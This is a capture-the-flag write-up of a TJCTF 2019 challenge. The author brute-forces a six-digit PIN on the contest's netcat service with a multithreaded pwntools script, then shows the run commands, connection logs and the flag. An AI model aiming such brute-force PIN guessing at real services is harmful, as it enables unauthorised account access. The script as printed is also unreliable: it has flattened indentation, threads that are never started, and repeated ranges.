Tags: misc 


# Simple Secure Secrets
Written by evanyeyeye

nc p1.tjctf.org 8000

Basically you need to guess the pin code for flag

Welcome to the Simply Secure Service! (TRIAL)
The product: an impregnable bunker for your most vulnerable secrets.
l - List all secret names
s - Store a secret
r - Reveal a secret
u - Upgrade to PRO
h - Display this help menu
x - Exit service
> r
Secret name: tjctf
Secret pin: 000001
Invalid pin. The appropriate authorities have been notified.

My first thought was there is a bug or what, but I couldn't find it

Assume the pin code is constant

I decided to brute force the pin number but its **1 million possible code**

Its possible possible using multiple thread and pwntools

[my script in python:](solve.py)
from pwn import *
from threading import Thread
import re
import sys

def guessing(fromNum,toNum):
s = remote('p1.tjctf.org',8000)
s.recvuntil("> ")
for i in range(fromNum,toNum):
s.sendline("%06d" % i)
text = s.recv()
print re.findall("tjctf{.*}",text)[0]
print "Pin : %06d" % i
if len(sys.argv) == 3:
i = int(sys.argv[1])
while (i != int(sys.argv[2])):
thread1 = Thread(target=guessing,args=(i,i+1000))
i += 1000
print "Need 2 arguments!\npython solve.py from to"
Running using two arguments:
python solve.py 0 100000 # Brute force pin from 000000 to 100000
Is this only 0 to 100,000, so I open 10 different teminal with different range:
python solve.py 100000 200000 # Second Terminal

python solve.py 100000 200000 # Third Terminal

python solve.py 100000 200000 # Forth Terminal
python solve.py 900000 1000000 # Tenth Terminal
**Just be patient**

After around 15 minutes I get the Flag!!
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
[+] Opening connection to p1.tjctf.org on port 8000: Done
Pin : 720561
But I don't know why I can't use this pin the reveal the flag:
Welcome to the Simply Secure Service! (TRIAL)
The product: an impregnable bunker for your most vulnerable secrets.
l - List all secret names
s - Store a secret
r - Reveal a secret
u - Upgrade to PRO
h - Display this help menu
x - Exit service
> r
Secret name: tjctf
Secret pin: 72-561
Secret pin must be in ###### format.
> r
Secret name: tjctf
Secret pin: 720561
Invalid pin. The appropriate authorities have been notified.
That is weird but I get the flag so I don't care anymore

## Flag
> tjctf{1_533_y0u_f0rc3d_y0ur_w4y_1n}

Original writeup (https://github.com/Hong5489/TJCTF-2019/tree/master/simple_secure).